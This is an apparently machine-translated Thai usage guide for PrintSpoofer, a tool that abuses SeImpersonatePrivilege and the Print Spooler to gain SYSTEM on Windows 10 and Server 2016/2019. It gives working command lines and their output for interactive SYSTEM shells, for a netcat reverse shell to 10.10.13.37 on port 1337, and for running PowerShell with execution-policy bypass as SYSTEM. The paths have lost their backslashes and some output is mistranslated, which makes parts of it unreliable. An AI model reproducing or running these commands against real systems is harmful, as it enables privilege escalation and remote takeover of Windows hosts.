จากบริการท้องถิ่น/เครือข่ายไปยังระบบโดยใช้ SeImpersonatePrivilege
บน Windows 10 และเซิร์ฟเวอร์ 2016/2019 ในทางที่ผิด
คุณสามารถตรวจสอบข้อความช่วยเหลือได้โดยใช้ตัวเลือก -h
C:เครื่องมือ>PrintSpoofer.exe -h PrintSpoofer v0.1 (โดย @itm4n) โดยมีเงื่อนไขว่าผู้ใช้ปัจจุบันมีสิทธิ์ SeImpersonate เครื่องมือนี้จะใช้ประโยชน์จากการพิมพ์ บริการตัวจัดคิวเพื่อรับโทเค็นระบบแล้วเรียกใช้คำสั่งที่กำหนดเองด้วย CreateProcessAsUser() ข้อโต้แย้ง: -cดำเนินการคำสั่ง *CMD* -i โต้ตอบกับกระบวนการใหม่ในพรอมต์คำสั่งปัจจุบัน (ค่าเริ่มต้นคือแบบไม่โต้ตอบ) -d วางกระบวนการใหม่บนเดสก์ท็อปที่สอดคล้องกับเซสชันนี้ *ID* (ตรวจสอบ ID ของคุณด้วย qwinsta) -h นั่นคือฉัน :) ตัวอย่าง: - เรียกใช้ PowerShell เป็นระบบในคอนโซลปัจจุบัน PrintSpoofer.exe -i -c powershell.exe - วางพรอมต์คำสั่ง SYSTEM บนเดสก์ท็อปของเซสชัน 1 PrintSpoofer.exe -d 1 -c cmd.exe - รับเชลล์ถอยหลัง SYSTEM PrintSpoofer.exe -c "c:Tempnc.exe 10.10.13.37 1337 -e cmd"
หากคุณมีเชลล์ แบบโต้ตอบ คุณสามารถสร้างกระบวนการระบบใหม่ในคอนโซลปัจจุบันของคุณได้
กรณีการใช้งาน : ผูกเชลล์, เชลล์ย้อนกลับ, psexec.py
ฯลฯ
C:เครื่องมือ>PrintSpoofer.exe -i -c cmd [+] พบสิทธิ์: SeImpersonatePrivilege [+] การฟังไปป์ที่มีชื่อ... [+] CreateProcessAsUser() ตกลง Microsoft Windows [เวอร์ชัน 10.0.19613.1000] (ค) 2020 Microsoft Corporation สงวนลิขสิทธิ์. C:WINDOWSsystem32>whoami nt ระบบอำนาจ
หากคุณสามารถ ดำเนินการคำสั่งได้ แต่คุณไม่มีเชลล์แบบโต้ตอบ คุณสามารถสร้างกระบวนการระบบใหม่และออกได้ทันทีโดยไม่ต้องโต้ตอบกับกระบวนการดังกล่าว
กรณีการใช้งาน : WinRM, WebShell, wmiexec.py
, smbexec.py
ฯลฯ
สร้างเชลล์แบบย้อนกลับ:
C:TOOLS>PrintSpoofer.exe -c "C:TOOLSnc.exe 10.10.13.37 1337 -e cmd" [+] พบสิทธิ์: SeImpersonatePrivilege [+] การฟังไปป์ที่มีชื่อ... [+] CreateProcessAsUser() ตกลง
ผู้ฟัง Netcat:
C:เครื่องมือ>nc.exe -l -p 1337 Microsoft Windows [เวอร์ชัน 10.0.19613.1000] (ค) 2020 Microsoft Corporation สงวนลิขสิทธิ์. C:WINDOWSsystem32>whoami nt ระบบอำนาจ
หากคุณ เข้าสู่ระบบภายในเครื่องหรือผ่าน RDP (รวมถึง VDI) คุณสามารถสร้างพรอมต์คำสั่ง SYSTEM บนเดสก์ท็อปของคุณได้ ขั้นแรก ตรวจสอบ ID เซสชันของคุณด้วยคำสั่ง qwinsta
จากนั้นระบุค่านี้ด้วยตัวเลือก -d
กรณีการใช้งาน : Terminal Session (RDP), VDI
C:เครื่องมือ>qwinsta SESSIONNAME ชื่อผู้ใช้ ID อุปกรณ์ประเภทสถานะ บริการ 0 แผ่นดิสก์ ผู้ดูแลระบบคอนโซล 1 ใช้งานอยู่ >rdp-tcp#3 ผู้ใช้แล็บ 3 ใช้งานอยู่ rdp-tcp 65536 ฟัง C:TOOLS>PrintSpoofer.exe -d 3 -c "powershell -ep บายพาส" [+] พบสิทธิ์: SeImpersonatePrivilege [+] การฟังไปป์ที่มีชื่อ... [+] CreateProcessAsUser() ตกลง